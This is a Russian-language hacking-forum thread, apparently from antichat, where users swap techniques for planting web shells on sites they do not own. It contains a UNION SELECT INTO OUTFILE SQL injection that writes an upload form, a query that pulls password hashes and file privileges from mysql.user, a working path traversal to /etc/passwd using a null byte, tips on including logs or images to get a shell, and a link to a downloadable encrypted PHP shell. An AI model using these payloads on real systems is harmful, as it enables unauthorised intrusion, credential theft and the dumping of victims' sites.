Пытаюсь лить шелл,ничего не получается,при таком запросе +union+select+1,2,3,'<html> <head> <title> a </title> </head> <body> <form action="upload.php" method="post" enctype="multipart/form-data"> <label for="file">Файл:</label><br/> <input type="file" name="file" id="file" class="input"/><br> <input type="submit" type=submit value="Отправить"> </form> </body> </html>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+into+outfile+'/var/www/html/azaz.html'-- только лишь на странице с которой пытаюсь зальть шелл изменяется титл,но остается ошибка The following errors has been found: HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ' at line 3 (# 256). The following will be reported to the Administrator: Error in line 7 of file /var/www/html/PHPscripts/error_inc.php..А файл залить не удается
Только HTML формы, только хардкод!!11 1. Да, там magic_quotes. Обойти можно, только если данные из SQL-запроса используються в дальнейших запросах. Вот сам способ: http://forum.antichat.ru/showpost.php?p=663815&postcount=39 2. Ты уверен, что у твоего пользователя есть file_priv? =\ 3. HTML - это крута!!1
Значит не повезло. Делай Code: select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user Дальше ищи phpmyadmin.
Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?
Подскажите, кто-нибудь пользовался данной багой? Если наглядный пример использования? http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1180 Nginx buffer underflow vulnerability Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests. Affected items Web Server The impact of this vulnerability Remote attackers may execute arbitrary code via crafted HTTP requests.
ставишь шелл http://profexer.name/pas/download.php - Файловый менеджер : групповое удаление, перемещение, копирование, скачка и загрузка файлов и директорий. переименование и создание файлов и директорий. правка, просмотр, изменении атрибутов файлов. поиск файлов и директорий, текста в файлах. Нормально все работает, просто вводи желаемый логин и пароль - скачаешь зашифрованный шелл. Только не забудь потом эти самый логин/пароль - подсмотреть их не будет где
Есть сайт с php include Вид: index.php?sub_cat= В начале добавляется sub/ , в конце .php Попробовал получить /etc/passwd с нулевым байтом в конце, сработало. Конструкция вида ../../../../../../../../../../etc/passwd%00 отлично работает, sub/ в начале не добавляется. Возникает вопрос, а как залить шелл? Как отбросить в начале sub/ ? Через /proc/self/environ не получается, данные не пишутся
sub ты откидываешь когда выходишь из деректории, т.е. типа ../../.. Насчет шела, иши все что можно проинклудить, логи, письма, картинку может может залить можешь там, фичу с протоколом data тоже попробуй. Тут где то были пару статей которые нормально тему сисек раскрывают.